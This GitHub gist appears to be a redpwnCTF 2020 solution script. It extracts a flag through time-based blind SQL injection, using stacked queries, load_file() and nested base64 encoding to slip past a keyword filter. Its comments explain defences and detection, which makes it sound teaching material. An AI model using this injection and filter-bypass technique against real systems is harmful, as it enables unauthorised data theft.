@parrot409
Last active June 27, 2020 04:16
My redpwn2020 solutions
#!/usr/bin/env python3
#Written by 0xParrot
#This is an unintended solution.
import requests
import string
import base64
import random
import json
import time
# Time-based blind SQL injection write-up for the redpwnCTF 2020 "got-stacks"
# challenge. The script recovers the flag file one character at a time by
# measuring how long the product-registration endpoint takes to answer.
#
# What the request relies on (all visible in the payload below):
#   * the `vurl` JSON field reaches the SQL statement unescaped, so a quote
#     and `);` close the intended INSERT (presumably an INSERT into `stock`,
#     judging by the statement the payload re-issues at its end);
#   * the database connection accepts several `;`-separated statements;
#   * the database account can call load_file() on /home/ctf/flag.txt;
#   * keyword filtering is defeated by base64-encoding the inner query and
#     letting the server decode it with from_base64() before PREPARE/EXECUTE.
#
# Defensive reading: a substring denylist does not stop injection. The fixes
# are bound parameters for every field, multi-statement execution disabled on
# the connection, and a database account without the FILE privilege (or with
# secure_file_priv restricting readable paths). For detection, look for
# response latencies clustering at the sleep value and for from_base64 /
# PREPARE / EXECUTE appearing in logged queries from the web application.

TARGET_URL = "https://got-stacks.2020.redpwnc.tf/api/registerproduct"

# Characters tried for each flag position, in this order.
CANDIDATES = string.ascii_lowercase + "{}" + string.ascii_uppercase + "_$&*+-="

# Substrings the payload must not contain in clear text; presumably this
# mirrors the challenge's server-side filter -- confirm against its source.
BLOCKED = ["union","and","or","sleep","hex","char","db","/","*","load_file","0x","fl","ag","txt","if"]

# Inner query: sleeps 6 seconds when the character at the given position of
# the flag file matches the candidate, otherwise returns immediately.
PROBE_TEMPLATE = "select if((select substr(load_file('/home/ctf/flag.txt'),%d,1)) like binary '%s',sleep(6),1)"

# Outer statement chain placed in `vurl`; the trailing '#' comments out
# whatever the application appends after the injected text.
STACKED_TEMPLATE = "sf'); set @s=(select %s);PREPARE stmt3 FROM @s;EXECUTE stmt3;INSERT INTO stock (stockid,name,quantity,vurl) VALUES (116643,'aaa',0,'af');#"

flag = ""
# NOTE(review): this outer loop has no exit condition; once no candidate
# matches, it keeps cycling through the character set.
while True:
    position = len(flag) + 1
    for candidate in CANDIDATES:
        probe = PROBE_TEMPLATE % (position, candidate)

        # Re-encode until no blocked substring is left, counting the layers
        # so the same number of from_base64() calls can undo them server-side.
        layers = 0
        while any(word in probe for word in BLOCKED):
            probe = base64.b64encode(probe.encode("ASCII")).decode("ASCII")
            layers += 1
        wrapped = "from_base64(" * layers + "'" + probe + "'" + ")" * layers
        vurl = STACKED_TEMPLATE % wrapped

        # A random stock id is drawn before the clock starts for each attempt.
        stock_id = str(random.randint(0,100000000))
        started = time.time()
        body = requests.post(
            TARGET_URL,
            json={"stockid" : stock_id,"name" : "ff","quantity":"0","vurl":vurl},
        ).text
        if "exists" in body:
            # The id was already taken: draw a new one and time a second attempt.
            stock_id = str(random.randint(0,100000000))
            started = time.time()
            requests.post(
                TARGET_URL,
                json={"stockid" : stock_id,"name" : "ff","quantity":"0","vurl":vurl},
            )
        elapsed = time.time() - started

        # Anything at or under 5 seconds is treated as "no sleep happened".
        if elapsed <= 5:
            print("[*] Tested: "+candidate)
            continue

        flag += candidate
        print("[+] FLAG: "+flag)
        break